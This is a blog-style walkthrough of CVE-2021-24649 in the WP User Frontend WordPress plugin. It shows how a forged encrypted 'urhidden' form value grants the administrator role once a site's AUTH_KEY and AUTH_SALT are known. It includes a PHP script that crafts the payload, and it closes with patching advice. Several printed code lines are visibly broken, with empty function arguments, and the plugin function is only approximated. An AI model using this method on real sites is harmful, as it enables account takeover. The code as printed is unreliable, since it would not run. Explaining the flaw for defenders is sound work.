WordPress is one of the world’s most popular content management systems, but its huge ecosystem of plugins can also introduce serious security risks. In this post, we’ll break down CVE-2021-24649, a critical vulnerability in the WP User Frontend plugin. We’re going to see how this bug lets an attacker become an admin just by crafting a single, not-so-hidden value in a registration form — if they can get their hands on the right secret keys.

We’ll explain how the vulnerability works, show you real code snippets, tell you where to find the original info, and walk through a simple exploit, all in plain English.

What is CVE-2021-24649?

CVE-2021-24649 affects WP User Frontend versions before 3.5.29. This plugin lets you build custom registration forms. One of the fields it supports is urhidden, which is an encrypted value that actually controls the new user’s role (like subscriber, author, admin, etc).

The problem? The plugin trusts the encrypted value passed in urhidden — and the encryption is based on WordPress constants: AUTH_KEY and AUTH_SALT. If an attacker can get those keys (by reading config files or if the site is using known, default keys), they can create their own encrypted value for any role — even admin.

Let’s break it down

1. User Registration Form: WPUF lets you register users from the frontend. It uses a hidden field called urhidden in the form, which contains the user role — encrypted.
2. Encryption with Predictable Keys: The encryption uses WP’s AUTH_KEY and AUTH_SALT from wp-config.php. If you know these, you can create *any* encrypted value you want.
3. No Server-Side Role Check: The server trusts whatever role comes back from the form as long as it decrypts successfully. No extra check!

This is the actual function (from /class/frontend-account.php)

// Encrypt role in urhidden
$role = $settings['role'];         // The role to assign to user
$encrypted_role = wpuf_encryption($role);

// Later, on registration
if ( isset( $_POST['urhidden'] ) ) {
    $dec_role = wpuf_encryption( sanitize_text_field( $_POST['urhidden'] ), 'd' );
    $userdata['role'] = $dec_role;
}

If you control $POST['urhidden'] and know the encryption scheme, you control the user role!

The plugin’s wpuf_encryption() is something like

function wpuf_encryption( $data, $action = 'e' ) {
    $key = AUTH_KEY . AUTH_SALT;
    if ( $action == 'e' ) {
        return base64_encode( openssl_encrypt( $data, 'AES-256-CBC', $key, , substr($key, , 16) ) );
    } else {
        return openssl_decrypt( base64_decode($data), 'AES-256-CBC', $key, , substr($key, , 16) );
    }
}

Suppose an attacker finds a local file inclusion bug elsewhere and reads wp-config.php

define('AUTH_KEY',  'somerandomstring123…');
define('AUTH_SALT', 'anotherrandomstring456…');

Now, on their local machine, they run a simple PHP script

<?php
$key = 'somerandomstring123…anotherrandomstring456…'; // AUTH_KEY . AUTH_SALT
$iv = substr($key, , 16);

$role = 'administrator';

$encrypted = base64_encode(openssl_encrypt($role, 'AES-256-CBC', $key, , $iv));
echo $encrypted;

Suppose this prints something like:  
D7lyvuNKCredUI8J7J70qg==

4. WPUF Processes the Registration

WPUF decrypts urhidden, sees administrator, and makes the new user an admin.

Original References

- WPScan: WP User Frontend < 3.5.29 - Arbitrary Role Assignment via urhidden parameter
- Patch Diff / GitHub Issue
- WordPress Plugin Directory - WP User Frontend

How to Protect Your Site

- Update the WP User Frontend plugin to the latest version.
- Never use default or published keys in your wp-config.php, always generate unique ones from https://api.wordpress.org/secret-key/1.1/salt/
- Fix or mitigate any file read or inclusion vulnerabilities FIRST, so attackers cannot get your configuration.

Conclusion

CVE-2021-24649 is a textbook example of how *assuming encryption is enough* is *never* safe when the key management and input validation aren’t strict. If your plugin lets users send back encrypted data and assumes it’s trustworthy, you’re putting your site at big risk — especially if your config keys leak.

If you use WP User Frontend, update now and review your site security. Never share or reuse your site’s crypto keys.

Timeline

Published on: 11/21/2022 11:15:00 UTC
Last modified on: 11/23/2022 15:43:00 UTC